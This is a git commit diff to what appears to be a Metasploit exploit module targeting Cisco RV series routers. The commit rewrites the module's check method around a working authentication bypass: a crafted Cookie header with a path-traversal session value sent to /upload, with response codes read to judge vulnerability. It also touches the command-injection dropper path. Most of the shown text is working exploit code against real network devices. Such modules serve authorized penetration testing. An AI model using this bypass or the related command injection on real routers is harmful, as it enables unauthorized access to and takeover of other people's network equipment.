Rewrote check method to only abuse authentication bypass. Added additional status checks.

This commit is contained in:
Stephen Wildow 2023-02-11 17:43:33 -05:00
parent 036ed7f467
commit 79b1801a4f
No known key found for this signature in database
GPG Key ID: 3D8ACAD402C22B27
1 changed files with 27 additions and 13 deletions


@ -88,22 +88,35 @@ class MetasploitModule < Msf::Exploit::Remote
) )
end end
# sessionid utilized later needs to be set to length
# of 16 or exploit will fail. Tested with lengths
# 14-17
def generate_session_id
return Rex::Text.rand_text_alphanumeric(16)
end
def check def check
# Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce res = send_request_cgi({
# Test to see if router is responding and possibly vulnerable 'method' => 'GET',
res = send_exploit('id') 'uri' => '/upload',
'headers' => {
'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id
}
}, 10)
return CheckCode::Unknown("Didn't receive a response from the target.") if res.nil? # A proper "upload" will trigger file creation. So created above is an incorrect "upload" call to avoid file
# creation. The router return a status code 405 Not Allowed if authentication has been bypassed by above request.
# Versions 1.0.03.26 and above will respond with 403 Forbidden during exploitation # The firmware containing this authentication bypass also contains the command injection vulnerability that will be
return CheckCode::Safe('The target responded with 403 Forbidden and is not vulnerable.') if res.code == 403 # abused during actual exploitation. Non-vulnerable firmware versions will respond with 403 Forbidden.
if res.nil?
# Vulnerable versions will respond with 301 Moved Permanently in body of response return CheckCode::Unknown('The device did not respond to request packet.')
if res.body.include?('<head><title>301 Moved Permanently</title></head>') elsif !res.nil? && res.code == 405
return CheckCode::Appears('The device responded to exploitation with a 200 OK.') return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
elsif res.code == 403
return CheckCode::Safe('The device is not vulnerable to exploitation.')
else # Catch-all
return CheckCode::Unknown('The target responded in such a way that exploitation in unknown and unlikely.')
end end
CheckCode::Safe('The target did not respond with an expected payload.')
end end
def execute_command(cmd, _opts = {}) def execute_command(cmd, _opts = {})
@ -116,6 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
end end
if target['Type'] == :linux_dropper if target['Type'] == :linux_dropper
fail_with(Failure::Unreachable, 'The target did not respond') unless res
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200 fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
begin begin
body_json = res.get_json_document body_json = res.get_json_document